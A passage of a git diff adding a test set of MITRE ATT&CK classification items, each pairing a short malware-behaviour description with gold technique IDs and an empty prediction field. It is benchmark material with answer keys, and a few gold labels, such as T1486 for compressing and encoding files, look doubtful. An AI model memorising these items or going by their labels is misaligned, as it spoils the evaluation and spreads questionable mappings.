diff --git "a/test/tram_zeroshot_test.json" "b/test/tram_zeroshot_test.json"
new file mode 100644--- /dev/null
+++ "b/test/tram_zeroshot_test.json"
@@ -0,0 +1,5928 @@
+[
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "FIN6 conducted internal reconnaissance with a Windows batch file leveraging Adfind to query Active Directory, then 7-zip to compress the results for exfiltration",
+ "gold": [
+ "T1069",
+ "T1018"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": ", a tool that has been used by adversaries, writes programs to the ADMIN$ network share to execute commands on remote systems.",
+ "gold": [
+ "T1021.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "achieves persistence by creating a shortcut in the Startup folder.",
+ "gold": [
+ "T1547.001",
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "achieves persistence by using various Registry Run keys.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A configuration file is encrypted with a simple XOR key, 0x53.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "actors deleted tools and batch files from victim systems.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "actors installed a credential logger on Microsoft Exchange servers. also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "actors mapped network drives using net use.",
+ "gold": [
+ "T1021.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "actors used the following command after exploiting a machine with malware to acquire information about local networks: ipconfig /all >> %temp%\\download",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "actors used the following command following exploitation of a machine with malware to list local groups: net localgroup administrator >> %temp%\\download",
+ "gold": [
+ "T1069"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "added the registry value ntdll to the Registry Run key to establish persistence.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "adds a sub-key under several Registry run keys.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "adds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.",
+ "gold": [
+ "T1486",
+ "T1560",
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "adds itself to the startup folder or adds itself to the Registry key SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run for persistence.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "adds permissions and remote logins to all users.",
+ "gold": [
+ "T1098"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "adds the setuid flag to a binary so it can easily elevate in the future.",
+ "gold": [
+ "T1548.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Adversaries can direct to upload files to the C2 Server.",
+ "gold": [
+ "T1041"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After collecting documents from removable media, compresses the collected files.",
+ "gold": [
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After compromising a victim, discovers all running services.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After data is collected by malware, it is exfiltrated over the existing C2 channel.",
+ "gold": [
+ "T1041"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A module in collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A module in gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.",
+ "gold": [
+ "T1552.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "An downloader establishes SOCKS5 connections to two separate IP addresses over TCP port 1913 and TCP port 81.",
+ "gold": [
+ "T1571"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "An loader Trojan saves its payload with hidden file attributes.",
+ "gold": [
+ "T1564.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.",
+ "gold": [
+ "T1040"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A tool can create a new Registry key under HKEY_CURRENT_USER\\Software\\Classes\\.",
+ "gold": [
+ "T1112"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "automatically collects data about the victim and sends it to the control server.",
+ "gold": [
+ "T1119"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A variant accesses a screenshot saved in the clipboard and converts it to a JPG image.",
+ "gold": [
+ "T1115"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A variant can use port 127 for communications.",
+ "gold": [
+ "T1571"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A variant registers as a Winlogon Event Notify DLL to establish persistence.",
+ "gold": [
+ "T1547.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"A variant takes screenshots by simulating the user pressing the \"\"Take Screenshot\"\" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.\"",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A variant uses a custom packer.",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A version of introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A version of uses the MPRESS packer.",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "backdoor RoyalDNS established persistence through adding a service called Nwsapagent.",
+ "gold": [
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "base64 encodes strings that are sent to the C2 over its DNS tunnel.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "binds to a raw socket on a random source port between 31800 and 31900 for C2.",
+ "gold": [
+ "T1095"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.",
+ "gold": [
+ "T1029"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can be used to automate exploitation of SQL injection vulnerabilities.",
+ "gold": [
+ "T1190"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can be used to discover routing configuration information.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can be used to gather information on user accounts within a domain.",
+ "gold": [
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can bypass UAC and create an elevated COM object to escalate privileges.",
+ "gold": [
+ "T1548.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can capture screenshots of the desktop over multiple monitors.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can collect system information.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can communicate using HTTP or HTTPS.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can compress data before sending it.",
+ "gold": [
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "can create a link to itself in the Startup folder to automatically start itself upon system restart.",
+ "gold": [
+ "T1547.001"
+ ],
